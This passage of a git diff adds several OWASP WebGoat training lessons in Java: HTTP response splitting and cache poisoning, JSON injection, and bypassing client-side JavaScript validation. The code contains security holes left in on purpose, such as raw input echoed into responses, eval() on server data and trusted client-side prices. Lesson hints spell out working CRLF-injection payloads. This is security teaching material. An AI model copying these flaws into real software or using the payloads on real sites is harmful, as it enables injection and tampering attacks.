+			} else if(browser.indexOf("msie") != -1) {
+				result = "Internet Explorer";
+			} else if(browser.indexOf("opera") != -1) {
+				result = "Opera";
+			} else if(browser.indexOf("safari") != -1) {
+				result = "Safari";
+			} else if(browser.indexOf("netscape") != -1) {
+				browser = browser.substring(browser.indexOf("netscape"));
+				
+				offset = getOffset(browser);
+				
+				result = browser.substring(0, offset);
+			} else if(browser.indexOf("konqueror") != -1) {
+				result = "Konqueror";
+			} else if(browser.indexOf("mozilla") != -1) {
+				result = "Mozilla";
+			}
+		}
+		
+		return result;
+	}
+	
+	private int getOffset(String s) {
+		int result = s.length();
+		
+		for(int i=0; i<s.length(); i++) {
+			if(s.charAt(i) < 33 || s.charAt(i) > 126) {
+				result = i;
+				break;
+			}
+		}
+		
+		return result;
+	}
+	
+    public Element getCredits()
+    {
+    	return super.getCustomCredits("", ASPECT_LOGO);
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/HttpSplitting.java b/main/project/JavaSource/org/owasp/webgoat/lessons/HttpSplitting.java
new file mode 100644
index 000000000..74f68d5aa
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/HttpSplitting.java
@@ -0,0 +1,297 @@
+package org.owasp.webgoat.lessons;
+
+import java.io.PrintWriter;
+import java.net.URLDecoder;
+import java.text.DateFormat;
+import java.text.SimpleDateFormat;
+import java.util.*;
+
+import javax.servlet.http.HttpServletResponse;
+
+import org.apache.ecs.*;
+import org.apache.ecs.html.*;
+import org.owasp.webgoat.session.ECSFactory;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ * 
+ * @author     Sherif Koussa <a href="http://www.macadamian.com">Macadamian Technologies.</a>
+ * @created    September 30, 2006
+ */
+
+public class HttpSplitting extends SequentialLessonAdapter
+{
+
+    private final static String LANGUAGE = "language";
+
+    private final static String REDIRECT = "fromRedirect";
+
+    private static String STAGE = "stage";
+
+    private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt(
+    "Macadamian Technologies").setBorder(0).setHspace(0).setVspace(0);
+
+    /**
+     * Description of the Method
+     * 
+     * @param s Current WebSession
+     */
+    public void handleRequest(WebSession s)
+    {
+	//Setting a special action to be able to submit to redirect.jsp
+	Form form = new Form("/WebGoat/lessons/General/redirect.jsp?"
+		+ "Screen=" + String.valueOf(getScreenId()) + "&menu="
+		+ getDefaultCategory().getRanking().toString(), Form.POST)
+		.setName("form").setEncType("");
+
+	form.addElement(createContent(s));
+
+	setContent(form);
+    }
+
+
+    protected Element doHTTPSplitting(WebSession s)
+    {
+	ElementContainer ec = new ElementContainer();
+	String lang = null;
+
+	try
+	{
+	    ec.addElement(createAttackEnvironment(s));
+	    lang = URLDecoder.decode(s.getParser()
+		    .getRawParameter(LANGUAGE, ""), "UTF-8");
+
+	    //Check if we are coming from the redirect page
+	    String fromRedirect = s.getParser().getStringParameter(
+		    "fromRedirect", "");
+
+	    if (lang.length() != 0 && fromRedirect.length() != 0)
+	    {
+		//Split by the line separator line.separator is platform independant
+		String lineSep = System.getProperty("line.separator");
+		String[] arrTokens = lang.toString().toUpperCase().split(
+			lineSep);
+
+		//Check if the user ended the first request and wrote the second malacious reply
+
+		if (Arrays.binarySearch(arrTokens, "CONTENT-LENGTH: 0") >= 0
+			&& Arrays.binarySearch(arrTokens, "HTTP/1.1 200 OK") >= 0)
+		{
+		    HttpServletResponse res = s.getResponse();
+		    res.setContentType("text/html");
+		    PrintWriter out = new PrintWriter(res.getOutputStream());
+		    String message = lang.substring(lang.indexOf("<html>"));
+
+		    out.print(message);
+		    out.flush();
+		    out.close();
+
+		    getLessonTracker(s).setStage(2);
+
+		    StringBuffer msg = new StringBuffer();
+
+		    msg.append("Good Job! ");
+		    msg
+			    .append("This lesson has detected your successfull attack, ");
+		    msg
+			    .append("time to elevate your attack to a higher level. ");
+		    msg
+			    .append("Try again and add Last-Modified header, intercept");
+		    msg.append("the reply and replace it with a 304 reply.");
+
+		    s.setMessage(msg.toString());
+
+		}
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error generating " + this.getClass().getName());
+	    e.printStackTrace();
+	}
+	return (ec);
+    }
+
+
+    protected Element createContent(WebSession s)
+    {
+	return super.createStagedContent(s);
+    }
+
+
+    protected Element doStage1(WebSession s) throws Exception
+    {
+	return doHTTPSplitting(s);
+    }
+
+
+    protected Element doStage2(WebSession s) throws Exception
+    {
+	return doCachePoisining(s);
+    }
+
+
+    protected Element createAttackEnvironment(WebSession s) throws Exception
+    {
+	ElementContainer ec = new ElementContainer();
+	String lang = null;
+
+	if (getLessonTracker(s).getStage() == 1)
+	{
+	    ec.addElement(new H3("Stage 1: HTTP Splitting:<br><br>"));
+	}
+	else
+	{
+	    ec.addElement(new H3("Stage 2: Cache Poisoning:<br><br>"));
+	}
+	ec.addElement(new StringElement("Search by country : "));
+
+	lang = URLDecoder.decode(s.getParser().getRawParameter(LANGUAGE, ""),
+		"UTF-8");
+
+	//add the search by field
+	Input input = new Input(Input.TEXT, LANGUAGE, lang.toString());
+	ec.addElement(input);
+
+	Element b = ECSFactory.makeButton("Search!");
+
+	ec.addElement(b);
+
+	return ec;
+    }
+
+
+    protected Element doCachePoisining(WebSession s) throws Exception
+    {
+	ElementContainer ec = new ElementContainer();
+
+	try
+	{
+	    s
+		    .setMessage("Now that you have successfully performed an HTTP Splitting, now try to poison"
+			    + " the victim's cache. Type 'restart' in the input field if you wish to "
+			    + " to return to the HTTP Splitting lesson.<br><br>");
+	    if (s.getParser().getRawParameter(LANGUAGE, "YOUR_NAME").equals(
+		    "restart"))
+	    {
+		getLessonTracker(s).getLessonProperties().setProperty(STAGE,
+			"1");
+		return (doHTTPSplitting(s));
+	    }
+
+	    ec.addElement(createAttackEnvironment(s));
+	    String lang = URLDecoder.decode(s.getParser().getRawParameter(
+		    LANGUAGE, ""), "UTF-8");
+	    String fromRedirect = s.getParser()
+		    .getStringParameter(REDIRECT, "");
+
+	    if (lang.length() != 0 && fromRedirect.length() != 0)
+	    {
+		String lineSep = System.getProperty("line.separator");
+		String dateStr = lang.substring(lang.indexOf("Last-Modified:")
+			+ "Last-Modified:".length(), lang.indexOf(lineSep, lang
+			.indexOf("Last-Modified:")));
+		if (dateStr.length() != 0)
+		{
+		    Calendar cal = Calendar.getInstance();
+
+		    DateFormat sdf = new SimpleDateFormat(
+			    "EEE, dd MMM yyyy HH:mm:ss z", Locale.US);
+
+		    if (sdf.parse(dateStr.trim()).after(cal.getTime()))
+		    {
+			makeSuccess(s);
+		    }
+		}
+	    }
+	}
+	catch (Exception ex)
+	{
+	    ec.addElement(new P().addElement(ex.getMessage()));
+	}
+	return ec;
+    }
+
+
+    protected Category getDefaultCategory()
+    {
+	return Category.GENERAL;
+    }
+
+
+    protected List<String> getHints(WebSession s)
+    {
+
+	List<String> hints = new ArrayList<String>();
+	hints.add("Enter a language for the system to search by.");
+	hints.add("Use CR (%0d) and LF (%0a) for a new line");
+	hints
+		.add("The Content-Length: 0 will tell the server that the first request is over.");
+	hints.add("A 200 OK message looks like this: HTTP/1.1 200 OK");
+	hints
+		.add("Try: language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a&lt;html&gt;Insert undesireable content here&lt;/html&gt;");
+	hints
+		.add("Cache Poisoning starts with including 'Last-Modified' header in the hijacked page and setting it to a future date.");
+	hints
+		.add("Try language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a&lt;html&gt;Insert undesireable content here&lt;/html&gt;");
+	hints
+		.add("'Last-Modified' header forces the browser to send a 'If-Modified-Since' header. Some cache servers will take the bait and keep serving the hijacked page");
+	hints
+		.add("Try to intercept the reply and add HTTP/1.1 304 Not Modified0d%0aDate:%20Mon,%2027%20Oct%202030%2014:50:18%20GMT");
+	return hints;
+
+    }
+
+    private final static Integer DEFAULT_RANKING = new Integer(20);
+
+
+    protected Integer getDefaultRanking()
+    {
+	return DEFAULT_RANKING;
+    }
+
+
+    /**
+     *  Gets the title attribute of the HelloScreen object
+     *
+     * @return    The title value
+     */
+    public String getTitle()
+    {
+	return ("HTTP Splitting");
+    }
+
+
+    public Element getCredits()
+    {
+	return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO);
+    }
+
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/JSONInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/JSONInjection.java
new file mode 100644
index 000000000..90fd63c6d
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/JSONInjection.java
@@ -0,0 +1,315 @@
+package org.owasp.webgoat.lessons;
+
+import org.owasp.webgoat.session.WebSession;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.StringElement;
+import org.apache.ecs.html.Div;
+import org.apache.ecs.html.Form;
+import org.apache.ecs.html.IMG;
+import org.apache.ecs.html.Table;
+import org.apache.ecs.html.TR;
+import org.apache.ecs.html.TD;
+import org.apache.ecs.html.Input;
+import org.apache.ecs.html.BR;
+
+import java.io.PrintWriter;
+import java.util.List;
+import java.util.ArrayList;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ * 
+ * @author     Sherif Koussa <a href="http://www.macadamian.com">Macadamian Technologies.</a>
+ * @created    December 25, 2006
+ */
+
+public class JSONInjection extends LessonAdapter
+{
+
+    private final static Integer DEFAULT_RANKING = new Integer(30);
+
+    private final static String TRAVEL_FROM = "travelFrom";
+
+    private final static String TRAVEL_TO = "travelTo";
+
+    private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt(
+    "Macadamian Technologies").setBorder(0).setHspace(0).setVspace(0);
+
+    public void handleRequest(WebSession s)
+    {
+
+	try
+	{
+	    if (s.getParser().getRawParameter("from", "").equals("ajax"))
+	    {
+		String lineSep = System.getProperty("line.separator");
+		String jsonStr = "{"
+			+ lineSep
+			+ "\"From\": \"Boston\","
+			+ lineSep
+			+ "\"To\": \"Seattle\", "
+			+ lineSep
+			+ "\"flights\": ["
+			+ lineSep
+			+ "{\"stops\": \"0\", \"transit\" : \"N/A\", \"price\": \"$600\"},"
+			+ lineSep
+			+ "{\"stops\": \"2\", \"transit\" : \"Newark,Chicago\", \"price\": \"$300\"} "
+			+ lineSep + "]" + lineSep + "}";
+		s.getResponse().setContentType("text/html");
+		s.getResponse().setHeader("Cache-Control", "no-cache");
+		PrintWriter out = new PrintWriter(s.getResponse()
+			.getOutputStream());
+		out.print(jsonStr);
+		out.flush();
+		out.close();
+		return;
+	    }
+	}
+	catch (Exception ex)
+	{
+	    ex.printStackTrace();
+	}
+
+	Form form = new Form(getFormAction(), Form.POST).setName("form")
+		.setEncType("");
+	form.setOnSubmit("return check();");
+
+	form.addElement(createContent(s));
+
+	setContent(form);
+
+    }
+
+
+    /**
+     * Description of the Method
+     * 
+     * @param s Current WebSession
+     */
+
+    protected Element createContent(WebSession s)
+    {
+	ElementContainer ec = new ElementContainer();
+	String lineSep = System.getProperty("line.separator");
+	String script = "<script>"
+		+ lineSep
+		+ "function getFlights() {"
+		+ lineSep
+		+ "var fromField = document.getElementById('"
+		+ TRAVEL_FROM
+		+ "');"
+		+ lineSep
+		+ "if (fromField.value.length < 3 || fromField.value!='BOS') { return; }"
+		+ lineSep
+		+ "var toField = document.getElementById('"
+		+ TRAVEL_TO
+		+ "');"
+		+ lineSep
+		+ "if (toField.value.length < 3 || toField.value!='SEA') { return; }"
+		+ lineSep
+		+ "var url = '" + getLink() 
+		+ "&from=ajax&"
+		+ TRAVEL_FROM
+		+ "=' + encodeURIComponent(fromField.value) +"
+		+ "'&"
+		+ TRAVEL_TO
+		+ "=' + encodeURIComponent(toField.value);"
+		+ lineSep
+		+ "if (typeof XMLHttpRequest != 'undefined') {"
+		+ lineSep
+		+ "req = new XMLHttpRequest();"
+		+ lineSep
+		+ "} else if (window.ActiveXObject) {"
+		+ lineSep
+		+ "req = new ActiveXObject('Microsoft.XMLHTTP');"
+		+ lineSep
+		+ "   }"
+		+ lineSep
+		+ "   req.open('GET', url, true);"
+		+ lineSep
+		+ "   req.onreadystatechange = callback;"
+		+ lineSep
+		+ "   req.send(null);"
+		+ lineSep
+		+ "}"
+		+ lineSep
+		+ "function callback() {"
+		+ lineSep
+		+ "    if (req.readyState == 4) { "
+		+ lineSep
+		+ "        if (req.status == 200) { "
+		+ lineSep
+		+ "                   var card = eval('(' + req.responseText + ')');"
+		+ lineSep
+		+ "			 var flightsDiv = document.getElementById('flightsDiv');"
+		+ lineSep
+		+ "				flightsDiv.innerHTML = '';"
+		+ lineSep
+		+ "				var strHTML='';"
+		+ lineSep
+		+ "				strHTML = '<tr><td>&nbsp;</td><td>No of Stops</td>';"
+		+ lineSep
+		+ "				strHTML = strHTML + '<td>Stops</td><td>Prices</td></tr>';"
+		+ lineSep
+		+ "			 for(var i=0; i<card.flights.length; i++){"
+		+ lineSep
+		+ "				var node = card.flights[i];"
+		+ lineSep
+		+ "				strHTML = strHTML + '<tr><td><input name=\"radio'+i+'\" type=\"radio\" id=\"radio'+i+'\"></td><td>';"
+		+ lineSep
+		+ "			    strHTML = strHTML + card.flights[i].stops + '</td><td>';"
+		+ lineSep
+		+ "			    strHTML = strHTML + card.flights[i].transit + '</td><td>';"
+		+ lineSep
+		+ "			    strHTML = strHTML + '<div name=\"priceID'+i+'\" id=\"priceID'+i+'\">' + card.flights[i].price + '</div></td></tr>';"
+		+ lineSep
+		+ "			 }"
+		+ lineSep
+		+ "				strHTML = '<table border=\"1\">' + strHTML + '</table>';"
+		+ lineSep
+		+ "               flightsDiv.innerHTML = strHTML;"
+		+ lineSep
+		+ "        }}}"
+		+ lineSep
+		+
+
+		"function check(){"
+		+ lineSep
+		+ " if ( document.getElementById('radio0').checked  )"
+		+ lineSep
+		+ " { document.getElementById('price2Submit').value = document.getElementById('priceID0').innerHTML; return true;}"
+		+ lineSep
+		+ " else if ( document.getElementById('radio1').checked  )"
+		+ lineSep
+		+ " { document.getElementById('price2Submit').value = document.getElementById('priceID1').innerHTML; return true;}"
+		+ lineSep + " else " + lineSep
+		+ " { alert('Please choose one flight'); return false;}" + lineSep + "}"
+		+ lineSep + "</script>" + lineSep;
+	ec.addElement(new StringElement(script));
+	Table t1 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(0)
+		.setWidth("90%").setAlign("center");
+
+	TR tr = new TR();
+
+	tr.addElement(new TD("From: "));
+	Input in = new Input(Input.TEXT, TRAVEL_FROM, "");
+	in.addAttribute("onkeyup", "getFlights();");
+	in.addAttribute("id", TRAVEL_FROM);
+	tr.addElement(new TD(in));
+
+	t1.addElement(tr);
+
+	tr = new TR();
+	tr.addElement(new TD("To: "));
+	in = new Input(Input.TEXT, TRAVEL_TO, "");
+	in.addAttribute("onkeyup", "getFlights();");
+	in.addAttribute("id", TRAVEL_TO);
+	tr.addElement(new TD(in));
+
+	t1.addElement(tr);
+	ec.addElement(t1);
+
+	ec.addElement(new BR());
+	ec.addElement(new BR());
+	Div div = new Div();
+	div.addAttribute("name", "flightsDiv");
+	div.addAttribute("id", "flightsDiv");
+	ec.addElement(div);
+
+	Input b = new Input();
+	b.setType(Input.SUBMIT);
+	b.setValue("Submit");
+	b.setName("SUBMIT");
+	ec.addElement(b);
+
+	Input price2Submit = new Input();
+	price2Submit.setType(Input.HIDDEN);
+	price2Submit.setName("price2Submit");
+	price2Submit.setValue("");
+	price2Submit.addAttribute("id", "price2Submit");
+	ec.addElement(price2Submit);
+	if (s.getParser().getRawParameter("radio0", "").equals("on"))
+	{
+	    String price = s.getParser().getRawParameter("price2Submit", "");
+	    price = price.replace("$", "");
+	    if (Integer.parseInt(price) < 600)
+	    {
+		makeSuccess(s);
+	    }
+	    else
+	    {
+		s
+			.setMessage("You are close, try to set the price for the non-stop flight to be less than $600");
+	    }
+	}
+	return ec;
+    }
+
+    public Element getCredits()
+    {
+	return super.getCustomCredits("Created by Sherif Koussa", MAC_LOGO);
+    }
+
+    protected Category getDefaultCategory()
+    {
+	return Category.AJAX_SECURITY;
+    }
+
+
+    protected List<String> getHints(WebSession s)
+    {
+	List<String> hints = new ArrayList<String>();
+	hints.add("JSON stands for JavaScript Object Notation.");
+	hints.add("JSON is a way of representing data just like XML.");
+	hints.add("The JSON payload is easily interceptable.");
+	hints.add("Intercept the reply, change the $600 to $25.");
+	return hints;
+
+    }
+
+
+    protected Integer getDefaultRanking()
+    {
+	return DEFAULT_RANKING;
+    }
+
+
+    /**
+     *  Gets the title attribute of the HelloScreen object
+     *
+     * @return    The title value
+     */
+    public String getTitle()
+    {
+	return ("JSON Injection");
+    }
+
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/JavaScriptValidation.java b/main/project/JavaSource/org/owasp/webgoat/lessons/JavaScriptValidation.java
new file mode 100644
index 000000000..84fad2cbd
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/JavaScriptValidation.java
@@ -0,0 +1,333 @@
+package org.owasp.webgoat.lessons;
+
+import java.util.ArrayList;
+import java.util.List;
+import java.util.regex.Pattern;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.StringElement;
+import org.apache.ecs.html.A;
+import org.apache.ecs.html.Div;
+import org.apache.ecs.html.IMG;
+import org.apache.ecs.html.Input;
+import org.apache.ecs.html.P;
+import org.apache.ecs.html.TextArea;
+
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author     Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ * @created    October 28, 2003
+ */
+
+public class JavaScriptValidation extends LessonAdapter
+{
+	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0));
+	
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+    protected Element createContent(WebSession s)
+    {
+
+	ElementContainer ec = new ElementContainer();
+
+	// Regular expressions in Java and JavaScript compatible form
+
+	// Note: if you want to use the regex=new RegExp(\"" + regex + "\");" syntax
+
+	// you'll have to use \\\\d to indicate a digit for example -- one escaping for Java and one for JavaScript
+
+	String regex1 = "^[a-z]{3}$";// any three lowercase letters
+	String regex2 = "^[0-9]{3}$";// any three digits
+	String regex3 = "^[a-zA-Z0-9 ]*$";// alphanumerics and space without punctuation
+	String regex4 = "^(one|two|three|four|five|six|seven|eight|nine)$";// enumeration of numbers
+	String regex5 = "^\\d{5}$";// simple zip code
+	String regex6 = "^\\d{5}(-\\d{4})?$";// zip with optional dash-four
+	String regex7 = "^[2-9]\\d{2}-?\\d{3}-?\\d{4}$";//US phone number with or without dashes
+	Pattern pattern1 = Pattern.compile(regex1);
+	Pattern pattern2 = Pattern.compile(regex2);
+	Pattern pattern3 = Pattern.compile(regex3);
+	Pattern pattern4 = Pattern.compile(regex4);
+	Pattern pattern5 = Pattern.compile(regex5);
+	Pattern pattern6 = Pattern.compile(regex6);
+	Pattern pattern7 = Pattern.compile(regex7);
+	String lineSep = System.getProperty("line.separator");
+	String script = "<SCRIPT>"
+		+ lineSep
+		+ "regex1=/"
+		+ regex1
+		+ "/;"
+		+ lineSep
+		+ "regex2=/"
+		+ regex2
+		+ "/;"
+		+ lineSep
+		+ "regex3=/"
+		+ regex3
+		+ "/;"
+		+ lineSep
+		+ "regex4=/"
+		+ regex4
+		+ "/;"
+		+ lineSep
+		+ "regex5=/"
+		+ regex5
+		+ "/;"
+		+ lineSep
+		+ "regex6=/"
+		+ regex6
+		+ "/;"
+		+ lineSep
+		+ "regex7=/"
+		+ regex7
+		+ "/;"
+		+ lineSep
+		+ "function validate() { "
+		+ lineSep
+		+ "msg='JavaScript found form errors'; err=0; "
+		+ lineSep
+		+ "if (!regex1.test(document.form.field1.value)) {err+=1; msg+='\\n  bad field1';}"
+		+ lineSep
+		+ "if (!regex2.test(document.form.field2.value)) {err+=1; msg+='\\n  bad field2';}"
+		+ lineSep
+		+ "if (!regex3.test(document.form.field3.value)) {err+=1; msg+='\\n  bad field3';}"
+		+ lineSep
+		+ "if (!regex4.test(document.form.field4.value)) {err+=1; msg+='\\n  bad field4';}"
+		+ lineSep
+		+ "if (!regex5.test(document.form.field5.value)) {err+=1; msg+='\\n  bad field5';}"
+		+ lineSep
+		+ "if (!regex6.test(document.form.field6.value)) {err+=1; msg+='\\n  bad field6';}"
+		+ lineSep
+		+ "if (!regex7.test(document.form.field7.value)) {err+=1; msg+='\\n  bad field7';}"
+		+ lineSep + "if ( err > 0 ) alert(msg);" + lineSep
+		+ "else document.form.submit();" + lineSep + "} " + lineSep
+		+ "</SCRIPT>" + lineSep;
+	try
+	{
+	    String param1 = s.getParser().getRawParameter("field1", "abc");
+	    String param2 = s.getParser().getRawParameter("field2", "123");
+	    String param3 = s.getParser().getRawParameter("field3",
+		    "abc 123 ABC");
+	    String param4 = s.getParser().getRawParameter("field4", "seven");
+	    String param5 = s.getParser().getRawParameter("field5", "90210");
+	    String param6 = s.getParser().getRawParameter("field6",
+		    "90210-1111");
+	    String param7 = s.getParser().getRawParameter("field7",
+		    "301-604-4882");
+	    ec.addElement(new StringElement(script));
+	    TextArea input1 = new TextArea("field1", 1, 25).addElement(param1);
+	    TextArea input2 = new TextArea("field2", 1, 25).addElement(param2);
+	    TextArea input3 = new TextArea("field3", 1, 25).addElement(param3);
+	    TextArea input4 = new TextArea("field4", 1, 25).addElement(param4);
+	    TextArea input5 = new TextArea("field5", 1, 25).addElement(param5);
+	    TextArea input6 = new TextArea("field6", 1, 25).addElement(param6);
+	    TextArea input7 = new TextArea("field7", 1, 25).addElement(param7);
+
+	    Input b = new Input();
+	    b.setType(Input.BUTTON);
+	    b.setValue("Submit");
+	    b.addAttribute("onclick", "validate();");
+	    ec.addElement(new Div().addElement(new StringElement(
+		    "Field1: exactly three lowercase characters (" + regex1
+			    + ")")));
+	    ec.addElement(new Div().addElement(input1));
+	    ec.addElement(new P());
+	    ec.addElement(new Div().addElement(new StringElement(
+		    "Field2: exactly three digits (" + regex2 + ")")));
+	    ec.addElement(new Div().addElement(input2));
+	    ec.addElement(new P());
+	    ec.addElement(new Div()
+		    .addElement(new StringElement(
+			    "Field3: letters, numbers, and space only ("
+				    + regex3 + ")")));
+	    ec.addElement(new Div().addElement(input3));
+	    ec.addElement(new P());
+	    ec.addElement(new Div().addElement(new StringElement(
+		    "Field4: enumeration of numbers (" + regex4 + ")")));
+	    ec.addElement(new Div().addElement(input4));
+	    ec.addElement(new P());
+	    ec.addElement(new Div().addElement(new StringElement(
+		    "Field5: simple zip code (" + regex5 + ")")));
+	    ec.addElement(new Div().addElement(input5));
+	    ec.addElement(new P());
+	    ec.addElement(new Div().addElement(new StringElement(
+		    "Field6: zip with optional dash four (" + regex6 + ")")));
+	    ec.addElement(new Div().addElement(input6));
+	    ec.addElement(new P());
+	    ec.addElement(new Div().addElement(new StringElement(
+		    "Field7: US phone number with or without dashes (" + regex7
+			    + ")")));
+	    ec.addElement(new Div().addElement(input7));
+	    ec.addElement(new P());
+	    ec.addElement(b);
+
+	    // Check the patterns on the server -- and note the errors in the response
+	    // these should never match unless the client side pattern script doesn't work
+
+	    int err = 0;
+	    String msg = "";
+
+	    if (!pattern1.matcher(param1).matches())
+	    {
+		err++;
+		msg += "<BR>Server side validation violation: You succeeded for Field1.";
+	    }
+
+	    if (!pattern2.matcher(param2).matches())
+	    {
+		err++;
+		msg += "<BR>Server side validation violation:  You succeeded for Field2.";
+	    }
+
+	    if (!pattern3.matcher(param3).matches())
+	    {
+		err++;
+		msg += "<BR>Server side validation violation:  You succeeded for Field3.";
+	    }
+
+	    if (!pattern4.matcher(param4).matches())
+	    {
+		err++;
+		msg += "<BR>Server side validation violation:  You succeeded for Field4.";
+	    }
+
+	    if (!pattern5.matcher(param5).matches())
+	    {
+		err++;
+		msg += "<BR>Server side validation violation:  You succeeded for Field5.";
+	    }
+
+	    if (!pattern6.matcher(param6).matches())
+	    {
+		err++;
+		msg += "<BR>Server side validation violation:  You succeeded for Field6.";
+	    }
+
+	    if (!pattern7.matcher(param7).matches())
+	    {
+		err++;
+		msg += "<BR>Server side validation violation:  You succeeded for Field7.";
+	    }
+
+	    if (err > 0)
+	    {
+		s.setMessage(msg);
+	    }
+	    if (err >= 7)
+	    {
+		// This means they defeated all the client side checks
+		makeSuccess(s);
+	    }
+	}
+
+	catch (Exception e)
+	{
+	    s.setMessage("Error generating " + this.getClass().getName());
+	    e.printStackTrace();
+	}
+
+	return (ec);
+    }
+
+
+    /**
+     *  DOCUMENT ME!
+     *
+     * @return    DOCUMENT ME!
+     */
+    protected Category getDefaultCategory()
+    {
+	return Category.UNVALIDATED_PARAMETERS;
+    }
+
+
+    /**
+     *  Gets the hints attribute of the AccessControlScreen object
+     *
+     * @return    The hints value
+     */
+    protected List<String> getHints(WebSession s)
+    {
+	List<String> hints = new ArrayList<String>();
+
+	hints.add("The validation is happening in your browser.");
+	hints
+		.add("Try modifying the values with a proxy after they leave your browser");
+	hints
+		.add("Another way is to delete the JavaScript before you view the page.");
+
+	return hints;
+    }
+
+
+    /**
+     *  Gets the instructions attribute of the WeakAccessControl object
+     *
+     * @return    The instructions value
+     */
+    public String getInstructions(WebSession s)
+    {
+	String instructions = "This website performs both client and server side validation.  "
+		+ "For this exercise, your job is to break the client side validation and send the "
+		+ " website input that it wasn't expecting."
+		+ "<b> You must break all 7 validators at the same time. </b>";
+	return (instructions);
+    }
+
+    private final static Integer DEFAULT_RANKING = new Integer(120);
+
+
+    protected Integer getDefaultRanking()
+    {
+	return DEFAULT_RANKING;
+    }
+
+
+    /**
+     *  Gets the title attribute of the AccessControlScreen object
+     *
+     * @return    The title value
+     */
+    public String getTitle()
+    {
+	return ("Bypass Client Side JavaScript Validation");
+    }
+    
+    public Element getCredits()
+    {
+    	return super.getCustomCredits("", ASPECT_LOGO);
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/LessonAdapter.java b/main/project/JavaSource/org/owasp/webgoat/lessons/LessonAdapter.java
new file mode 100644
index 000000000..47ef1765f
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/LessonAdapter.java
@@ -0,0 +1,291 @@
+package org.owasp.webgoat.lessons;
+
+import java.io.BufferedReader;
+import java.io.FileReader;
+import java.util.ArrayList;
+import java.util.List;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.StringElement;
+import org.apache.ecs.html.Center;
+import org.apache.ecs.html.H3;
+import org.apache.ecs.html.IMG;
+import org.apache.ecs.html.P;
+import org.apache.ecs.html.PRE;
+import org.apache.ecs.html.TD;
